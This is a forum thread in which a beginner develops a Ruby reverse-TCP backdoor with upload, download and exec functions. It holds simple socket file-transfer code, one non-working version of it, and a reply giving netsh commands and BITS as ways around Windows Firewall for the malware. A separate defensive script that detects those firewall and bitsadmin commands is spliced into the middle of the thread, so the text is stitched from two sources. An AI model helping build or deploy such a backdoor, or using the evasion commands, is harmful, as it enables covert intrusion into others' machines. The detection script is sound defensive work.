Thread: Learning ruby... My first ruby backdoor...

  1. #1
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    Learning ruby... My first ruby backdoor...

    I'm a few days into learning ruby... I have started a basic reverse tcp backdoor... there will only be a few functions like upload, download and exec...

    the server writes a string, then the client receives it and processes it with some if expressions to determine what functions to execute...

    right now I'm stuck with uploading and downloading files on the client... this would be so easy with the use of 'net/ftp' but any time the client tries to ftp.get(file) the windows firewall pops up asking for permission...

    I have found a 'smb' function but it looks unstable and I have not tested this with the windows firewall... I would like to send files through ruby with tcp functions but I have found nothing helpful other than ftp and sftp.... I have not tested sftp yet but I'm sure it will have the same results...

    I could have ruby utilize netcat but this would be sketchy and I'm still not sure how the firewall will react...

    this is so far a lot of fun and everything is going together like planned, except for this firewall problem...

  2. #2
    Junior Member
    Join Date
    Apr 2009
    Posts
    43


    The most simple Windows Firewall Bypass I know of is BITS
    http://en.wikipedia.org/wiki/Backgro...ansfer_Service

    I'm not sure how you could interface with it in Ruby, but if you can execute shell commands then you can just use the BITS admin application.
    This will provide you with downloading files from elsewhere without firewall


    On the other hand if your ruby backdoor has admin privs you could easily add exceptions to the Windows Firewall, through shell commands


    Something along the lines of this (I will give a few examples)

    Single ports
    netsh firewall add portopening TCP 23 Telnet
    netsh firewall add portopening UDP 1337 Dunno
    netsh firewall add portopening ALL 5900 VNC

    Allow a program unrestricted access to the internet
    netsh firewall add allowedprogram C:\myapp.exe MyApp ENABLE
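
From the defender's side, the `netsh firewall add ...` commands and BITS transfers mentioned in the post above show up in process-creation logs. The following Ruby scan is an added example, not part of the original thread; the event field names, rule ids and sample events are constructed, and the `netsh advfirewall firewall add rule` and `bitsadmin /transfer` patterns go beyond the commands quoted in the post.

```ruby
# Added example: flag firewall-exception and BITS command lines in
# process-creation events (e.g. command-line auditing records).
RULES = [
  { id: :fw_port_opening,    re: /\bnetsh(\.exe)?\s+firewall\s+add\s+portopening\b/i },
  { id: :fw_allowed_program, re: /\bnetsh(\.exe)?\s+firewall\s+add\s+allowedprogram\b/i },
  { id: :advfw_add_rule,     re: /\bnetsh(\.exe)?\s+advfirewall\s+firewall\s+add\s+rule\b/i },
  { id: :bits_transfer,      re: %r{\bbitsadmin(\.exe)?\s+.*/(transfer|addfile)\b}i }
].freeze

# A firewall or BITS command spawned by a script host deserves a closer look.
SCRIPT_PARENTS = /\\(ruby|python|wscript|cscript)\.exe\z/i

Finding = Struct.new(:host, :rule, :severity, :command_line)

# Strip quoting and repeated spaces so the patterns see one canonical form.
def normalize(cmd)
  cmd.delete('"').squeeze(' ').strip
end

# Return one Finding per (event, matching rule) pair.
def scan(events)
  events.flat_map do |ev|
    cmd = normalize(ev[:command_line])
    sev = ev[:parent_image].match?(SCRIPT_PARENTS) ? :high : :medium
    RULES.select { |r| cmd.match?(r[:re]) }
         .map { |r| Finding.new(ev[:host], r[:id], sev, cmd) }
  end
end

# Constructed sample events (hypothetical hosts and field names).
SAMPLE_EVENTS = [
  { host: 'WS-01', parent_image: 'C:\\Ruby\\bin\\ruby.exe',
    command_line: 'netsh firewall add allowedprogram C:\\myapp.exe MyApp ENABLE' },
  { host: 'WS-01', parent_image: 'C:\\Windows\\System32\\cmd.exe',
    command_line: '"C:\\Windows\\System32\\netsh.exe"  firewall add portopening TCP 23 Telnet' },
  { host: 'WS-02', parent_image: 'C:\\Windows\\System32\\svchost.exe',
    command_line: 'bitsadmin /transfer job1 http://example.invalid/f.bin C:\\Temp\\f.bin' },
  { host: 'WS-03', parent_image: 'C:\\Windows\\explorer.exe',
    command_line: 'netsh interface ip show config' }
].freeze

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_EVENTS).each do |f|
    puts format('%-6s %-7s %-20s %s', f.host, f.severity, f.rule, f.command_line)
  end
end
```
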

  3. #3
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    That is helpful... the payloads in metasploit are coded in ruby, correct? I have spent time looking through the source of some payloads but it's hard for me to read code that is so advanced... I need to find some basic examples...

  4. #4
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    Ok... I have been looking around and found some example code for sending a file from the client to the server over a socket... I'm having trouble trying to use this example to get the client to download a file from the server...

    here is an example of how the client uploads a file to the server...
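    Code:
    # server.rb
    require 'socket'

    sock = TCPServer.open(2000)            # listen on TCP port 2000
    con = sock.accept                      # wait for the client to connect
    msg = con.read                         # read until the client closes its end
    destFile = File.new('test.txt', 'w')   # destination file on the server
    destFile.print msg
    destFile.close
    Code:
    # client.rb
    require 'socket'

    fileContent = File.read('c:\\folder\\test.txt')   # source file to send to the server
    sock = TCPSocket.open('localhost', 2000)
    sock.print fileContent
    sock.close                                        # closing signals end of file to the server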
    So that's a working example of how the client can send a file to the server over a socket... I have been at this all day trying to get the client to download a file from the server by looking at this example...

    Is there anyone that can help me?

  5. #5
    Moderator KMDave
    Join Date
    Jan 2010
    Posts
    2,281


    Well, by just looking at some lines of code it is hard to get anything working

    Just kidding.

    Where is your problem exactly? Like you can't get it implemented or you don't understand the code?
    Tiocfaidh ár lá

  6. #6
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    Quote: Originally Posted by KMDave
        Well, by just looking at some lines of code it is hard to get anything working

        Just kidding.

        Where is your problem exactly? Like you can't get it implemented or you don't understand the code?

    I understand the code... it's like write data to a socket, then on the other side this data is read then written to a file...

    the process is in my head but I can't implement this... also, the code I posted will only work with text files... images and executables don't function after being sent through the socket...


    Edit... here is my attempt to have the client download a file from the server...
    Code:
    # server.rb
    require 'socket'

    fileContent = File.read('text.txt')
    sock = TCPServer.open(2000)
    con = sock.accept
    sock.print fileContent
    sock.close
    Code:
    # client.rb
    require 'socket'

    sock = TCPSocket.open('localhost', 2000)
    destFile = File.new('c:\\hacked\\text.txt', 'w')
    destFile.print
    destFile.close
    It does not work... I have been moving things around trying to get this to work but I'm stuck...
